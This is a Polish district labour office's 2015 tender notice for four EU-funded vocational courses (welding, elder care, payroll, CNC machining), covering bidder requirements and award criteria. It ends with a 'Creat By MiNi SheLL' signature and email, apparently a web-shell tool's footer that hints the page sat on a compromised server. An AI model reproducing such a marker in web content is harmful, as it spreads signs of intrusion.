Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia wydanego na podstawie § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r. poz. 622) - pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
b) certyfikat potwierdzający realizację szkolenia w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego.

Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- obsługiwać tokarkę i frezarkę sterowaną numerycznie, 
- dobierać narzędzia i optymalne warunki skrawania, 
- rozróżniać funkcje parametrów skrawania narzędzi i funkcje pomocnicze, 
- rozróżniać i stosować kompensację promienia narzędzia przy toczeniu, 
- stosować cykle obróbkowe do toczenia, 
- symulować program w warunkach odpowiadających pracy rzeczywistej tokarki oraz frezarki, 
- interpretować komunikaty o ewentualnych błędach i wprowadzać ewentualne korekty, 
- wybierać i kompletować narzędzia do wykonania zadanego przedmiotu, 
- ustawiać i mocować narzędzia skrawające, 
- wprowadzać program sterujący do obrabiarki,
- sprawdzać poprawność działania zespołów obrabiarki CNC, 
- posługiwać się narzędziami i przyrządami pomiarowymi, 
- przestrzegać przepisy BHP podczas pracy na obrabiarkach. 

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
stanowisko tokarek i frezarek CNC, narzędzia pomiarowe - suwmiarki, mikrometry, średnicówki czujnikowe, płytki wzorcowe, kątomierze, mikroskop warsztatowy, czujniki zegarowe itp., stanowiska komputerowe wyposażone w odpowiednie oprogramowanie użytkowe do realizacji przedmiotowego szkolenia, inne, w zależności od metod dobranych przez prowadzącego. W cenę szkolenia należy wliczyć kompletne ubranie ochronne, niezbędne do wykonywania zajęć praktycznych - zgodne z wytycznymi BHP dotyczącymi pracy na stanowisku operatora CNC (szczegółowy opis kosztów dotyczących przedmiotowego odzienia należy ująć jako załącznik do preliminarza kosztów, wykazując tym samym zarówno kategorie, jak i ceny wyszacowane za przedmiotowy zakup). Odbiór wyszacowanego w preliminarzu kosztów ubrania ochronnego, uczestnicy szkolenia muszą potwierdzić pisemnie, stosownym oświadczeniem. Ubranie ochronne używane w trakcie kursu przez każdą osobę szkoloną przechodzi na własność kursanta po zakończeniu szkolenia.

Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne i praktyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 20:00,
b) dzienny wymiar zajęć na jednego uczestnika musi wynosić nie mniej niż 6 oraz nie więcej niż 8 godzin zegarowych,
c) szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
UWAGA! W przypadku organizacji szkolenia poza obszarem powiatu świdnickiego godzina wyjazdu uczestników szkolenia ze Świdnicy nie może być wcześniejsza niż 8:00; natomiast powrót kursantów do Świdnicy nie może zakończyć się później niż    o godz. 20:00..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zaktualizowany na bieżący rok kalendarzowy wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U.             z 2014 r. poz. 781 ) wydany na podstawie art. 20 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2015 r., poz. 149 z póź. zm.). Zamawiający dokona sprawdzenia spełnienia powyższego warunku poprzez weryfikację danych w elektronicznym Rejestrze Instytucji Szkoleniowych, dostępnym na stronach internetowych wojewódzkich urzędów pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zorganizowali w okresie ostatnich 3 lat co najmniej 2 szkolenia grupowe o tematyce zbliżonej do przedmiotu zamówienia ( za szkolenie grupowe uważa się szkolenie w którym uczestniczy co najmniej 8 osób). Zamawiający dokona sprawdzenia spełniania powyższego warunku poprzez weryfikację zapisu części I Załącznika do formularza oferta - rubryka Doświadczenie Wykonawcy w zakresie organizacji szkoleń grupowych oraz załączyć referencje do każdego szkolenia ujętego w tym wykazie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, iż dysponuje pomieszczeniami wykładowymi, których liczba i pojemność uwzględnia wielkość grupy szkoleniowej, jak również harmonogram zajęć. Wykonawca w opisie warunków szkolenia musi dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych ( tj. pełny adres) i w sposób szczegółowy opisać wyposażenie sal, w których prowadzone będą zajęcia dydaktyczne. W przypadku organizacji szkolenia poza siedzibą firmy należy dodatkowo załączyć stosowny dokument (porozumienie/umowa), potwierdzający prawo do dysponowania lokalem na czas trwania szkolenia. Aby umożliwić uczestnikom szkolenia właściwe przygotowanie praktyczne Wykonawca musi zapewnić odpowiednią ilość sprzętów oraz materiałów niezbędnych do przeprowadzenia zajęć. Dlatego też należy napisać jaki sprzęt i materiały będą wykorzystywane podczas zajęć oraz w jakich ilościach. W celu potwierdzenia spełnienia powyższego warunku należy wypełnić  rubrykę Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych części III załącznika do formularza oferta.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zarówno zajęcia teoretyczne, jak i praktyczne powinni prowadzić wykładowcy posiadający uprawnienia do wykonywania zawodu instruktora/wykładowcy - przy czym w przypadku kursów opisanych w Części 1 oraz 4 dopuszczalne jest zamiennie posiadanie przez osobę prowadzącą zajęcia doświadczenia zawodowego ( dłuższego niż 1 rok) w pracy na stanowisku objętym tematyką szkolenia. Osoby prowadzące zajęcia muszą posiadać odpowiednią wiedzę oraz przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Wykładowcy winni dysponować stosownymi dokumentami (np. certyfikaty, świadectwa, zaświadczenia, dyplomy, itp.), które potwierdzą kwalifikacje  i uprawnienia kadry szkoleniowej.  Kserokopii niniejszych dokumentów nie należy dołączyć do oferty szkoleniowej, lecz uwzględnić je opisując należycie w załączniku do formularza oferta w poz. II pod nazwą KWALIFIKACJE KADRY DYDAKTYCZNEJ. Każdy wykładowca musi mieć doświadczenie praktyczne w zakresie prowadzonych zajęć tj. przeprowadził co najmniej 2 szkolenia grupowe odpowiadające tematyce przedmiotu zamówienia w ciągu ostatnich 3 lat. Zakres lub nazwy przeprowadzonych szkoleń oraz ich termin  należy wskazać w załączniku do formularza oferta w poz. II pod nazwą KWALIFIKACJE KADRY DYDAKTYCZNEJ. Dodatkowo Wykonawca powinien posiadać potencjał ludzki umożliwiający zapewnienie zastępstwa osób prowadzących zajęcia, w przypadku niedostępności personelu określonego w wykazie kadry szkoleniowej. W takim przypadku zastępstwo to powinno być powierzone osobie lub osobom o odpowiednim przygotowaniu zawodowym nie gorszym od przygotowania zawodowego osoby lub osób zastępowanych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - certyfikat jakości usług lub inny dokument - 10</li>
<li>3 - kwalifikacje kadry dydaktycznej - 10</li>
<li>4 - doświadczenie kadry dydaktycznej - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość zmian postanowień zawartych w umowie w stosunku do treści oferty w przypadku:	
zmiany liczby uczestników szkolenia do 20% w sytuacji gdy Zamawiającemu nie uda się skompletować pełnej grupy szkoleniowej osób uprawnionych do odbycia szkolenia, bądź gdy wyniknie nieoczekiwana konieczność zwiększenia liczby uczestników szkolenia. W takim przypadku zmianie ulega również całkowity koszt szkolenia liczony jako iloczyn opłaty za jednego uczestnika szkolenia (wraz z egzaminem państwowym/zewnętrznym) i ilości osób skierowanych na kurs.
konieczności zmniejszenia przez Wykonawcę kwoty preliminowanych kosztów związanych z realizowanym zamówieniem,
konieczności zmiany warunków płatności, o ile powstałe okoliczności wykażą zasadność takowego działania,
gdy Wykonawca uzasadni celowość i konieczność zwiększenia do 20% ilości zajęć praktycznych, kosztem zajęć teoretycznych, przy zachowaniu ogólnej ilości godzin każdej grupy szkoleniowej, pod warunkiem, że inne przepisy prawne dot. organizacji szkolenia nie stanowią inaczej,
zmiany terminu realizacji zamówienia bądź wyznaczenia (w porozumieniu z Wykonawcą) dodatkowego terminu wykonania przedmiotu zamówienia, w sytuacji, gdy:
1.	niewykonanie zamówienia będzie spowodowane przyczynami niezależnymi od Wykonawcy (np. działania siły wyższej),
2.	pełna grupa szkoleniowa osób uprawnionych do odbycia szkolenia nie zostanie na czas skompletowana.
zmiany w wykazie kadry, którą dysponuje lub będzie dysponował Wykonawca. Zmiany te muszą wynikać z przyczyn niezależnych od Wykonawcy, np. choroba osoby mającej prowadzić zajęcia. Zmiana może nastąpić wówczas, gdy nowa kadra dydaktyczna będzie posiadała stosowne uprawnienia do prowadzenia zajęć, a także wykształcenie i doświadczenie zawodowe nie mniejsze od osoby zastępowanej, której dane zostały przekazane wraz z ofertą Zamawiającemu,
zmiany miejsca organizacji szkolenia z zachowaniem wytycznych opisanych w SIWZ,
zmiany w harmonogramie zajęć, programie szkolenia oraz we wzorach wydanych zaświadczeń, jednakże wyłącznie pod warunkiem zaakceptowania ich przez Zamawiającego,
pozyskania przez Zamawiającego nowych informacji dotyczących szczegółowych wytycznych z zakresu finansowania szkoleń w ramach projektu Aktywizacja osób w wieku od 30 roku życia pozostających bez zatrudnienia, znajdujących się w szczególnej sytuacji na rynku pracy w powiecie świdnickim realizowanego w ramach Regionalnego Programu Operacyjnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.swidnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 08:30, miejsce: Powiatowy Urząd Pracy
ul. M. Skłodowskiej - Curie 5
58-100 Świdnica
pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> finansowanie w ramach projektu Aktywizacja osób w wieku od 30 roku życia pozostających bez zatrudnienia, znajdujących się w szczególnej sytuacji na rynku pracy w powiecie świdnickim realizowanego w ramach Regionalnego Programu Operacyjnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodą MAG (135) oraz blach spoinami czołowymi metodą MAG (135) - 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. zastosowanie elektryczności do spawania łukowego
2. urządzenia spawalnicze
3. bezpieczeństwo i higiena pracy
4. bezpieczna praca na hali produkcyjnej
5. materiały dodatkowe do spawania
6. spawanie w praktyce
7. oznaczanie i wymiarowanie spoin
8. metody przygotowania złączy do spawania
9. kwalifikowanie spawaczy
10. budowa i użytkowanie urządzeń do spawania MAG
11. charakterystyka spawania MAG oraz typowe parametry
12. wprowadzenie do zagadnień wytwarzania stali
13. złącza spawane blach
14. spawalność stali
15. skurcz, naprężenia i odkształcenia
16. niezgodności spawalnicze
17. przegląd procesów spawania
18. bezpieczna praca na montażu
19. kontrola i badania
20. zapewnienie jakości w spawalnictwie
21. instruktaż wstępny
22. ćwiczenia praktyczne
23. umiejętność poszukiwania zatrudnienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. certyfikat jakości usług lub inny dokument - 10</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekun osoby starszej z podstawami opieki przedmedycznej i nauką języka obcego - 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. psychospołeczne uwarunkowania pracy z podopiecznymi,
2. rozwiązywanie problemów podopiecznego,
3. opieka nad podopiecznymi,
4. umiejętności wspomagające pracę z podopiecznymi,
5. udzielanie pierwszej pomocy przedmedycznej,
6. profilaktyka zdrowotna,
7. nauka języka niemieckiego,
8. umiejętność poszukiwania zatrudnienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. certyfikat jakości usług lub inny dokument - 10</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Referent kadrowo-płacowy z elementami księgowości i nauką języka obcego - 15 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. kadry,
2. płace,
3. ubezpieczenia społeczne,
4. prawo pracy,
5. klasyfikacja podmiotów gospodarczych,
6. obsługa programów kadrowo - płacowych (w tym rozliczanie małych firm w programach komputerowych),
7. program Płatnik,
8. rozliczanie gotówkowe i bezgotówkowe firmy,
9. pozyskiwanie funduszy europejskich,
10. nauka języka angielskiego,
11. umiejętność poszukiwania zatrudnienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Programowanie i obsługa obrabiarek sterowanych numerycznie CNC z blokiem rysunku technicznego - 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres szkolenia powinien zawierać m.in. następujące elementy:
1) przepisy BHP i ergonomia pracy w zakresie obszaru zawodowego,
2) pomiar kształtu i wymiarów przedmiotu obrabianego,
3) kompletowanie, analiza i czytanie rysunku technicznego,
4) obróbka skrawaniem i narzędzia skrawające w zakresie obrabiarek CNC,
5) budowa obrabiarek CNC. Sterowanie i obsługa obrabiarek CNC. Przygotowanie obrabiarki CNC do pracy,
6) przygotowanie programu do uruchomienia,
7) uruchomienie i przebieg programu obróbki,
8) szkolenie praktyczne na maszynach produkcyjnych,
9) praktyczna nauka obsługi tokarki oraz frezarki CNC,
10) umiejętność poszukiwania i pozyskiwania zatrudnienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. certyfikat jakości usług lub inny dokument - 10</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com